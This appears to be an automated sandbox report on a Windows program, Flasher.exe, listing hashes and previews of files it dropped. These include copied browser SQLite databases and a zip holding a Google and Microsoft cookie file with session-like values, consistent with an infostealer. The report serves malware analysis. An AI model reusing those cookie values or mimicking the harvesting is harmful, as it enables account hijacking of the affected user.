                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):2.5793180405395284
                                                                    Encrypted:false
                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):2.5793180405395284
                                                                    Encrypted:false
                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):2.5793180405395284
                                                                    Encrypted:false
                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                    Category:dropped
                                                                    Size (bytes):938450
                                                                    Entropy (8bit):7.965139198255806
                                                                    Encrypted:false
                                                                    SSDEEP:12288:0ohDfNc/PGaqTyzKX5o/i46oWb85BD4ojs4Wj9CJYT7RlXsVlf/RVF53NLMJkqz:0oJC/PRgyzi5oK85F4ojbWRSYT72d6Tz
                                                                    MD5:794C141621709509927B9120BD6982BC
                                                                    SHA1:4EA220DC6CBF859EDA79FDB0F5BD9BB751177540
                                                                    SHA-256:D0A154032DAD6FC2B621D73712C26FD15F7D15FBB5E261B0EE0F7499FAC55090
                                                                    SHA-512:FA40665B45702D027BB7B62779A87C31883D2A24DA9EC5055A66E783781DD46163135BB2D96CB632D91883A0E87769879DC1A61B97C1A9BD6803876AE10BB38F
                                                                    Malicious:false
                                                                    Preview:PK.........~.Y.:0.............cookies_google_default.txt.google.com.false./.TRUE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.true./.TRUE.13340887435186329..AspNetCore.AuthProvider.True.support.microsoft.com.true./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.true./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.true./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.false./.TRUE.13372
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                    Category:dropped
                                                                    Size (bytes):20386
                                                                    Entropy (8bit):5.0102132434779785
                                                                    Encrypted:false
                                                                    SSDEEP:384:uOl9tybTPHTPYvZR1lDOl9tybTPHTPYvZR1lQC:ugtyCPgtyCMC
                                                                    MD5:767176BA0DB3433DBEF1E4E57512D010
                                                                    SHA1:21EB8C247D83B8EAE9EBAAC46D977822882FBFA8
                                                                    SHA-256:B5708ACA155E0B7504B33EFFF5B165129DA1A7B56E3D1B5C9A7856EF875A0504
                                                                    SHA-512:D344E3FC13628A0E23489AF8C93A21CE377EEC2497A9379ED2510E4266AEE0745D95A560BDCDAD39C1ABF50C050790FB487D6A899C0131D89F49D9891D23880C
                                                                    Malicious:false
                                                                    Preview:PK.........Y.*.M............DTBZGIOOSO.docxDTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXD
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.017262956703125623
                                                                    Encrypted:false
                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                    Malicious:false
                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.5380227771096076
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Flasher.exe
                                                                    File size:3'266'048 bytes
                                                                    MD5:7a16f2f0629a440695945db2a191c6a1
                                                                    SHA1:067c54721377eeefd199acb37402308bdfe73b3b
                                                                    SHA256:989af492fa898868e67636bf47e06a7c5864f31849fc3b3a07b07e7a3a62d944
                                                                    SHA512:6b698efd1ce0c5ecce64ab63146fc04d9086f70075fc89482e4141b69c8e31327e28618f0f37bc89eadf5ae7211b282beb9b786c9b61e5008405add527a81e0c
                                                                    SSDEEP:49152:rvlat1Rsi9Zn31w7LsuPKdDeXid5506WGPmFaRa2M/S6vya7/fmzXt8g:e/ssn3QsaKJ9SasXv72zXt8g
                                                                    TLSH:0DE58D43F69445EAC06AC178C74B9323F772B88A0B24A79B17E48A713F57B611F2D358
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.......................~.......~.......~.......~.......................z...............z.......Rich....................PE..d..
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x140242750
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
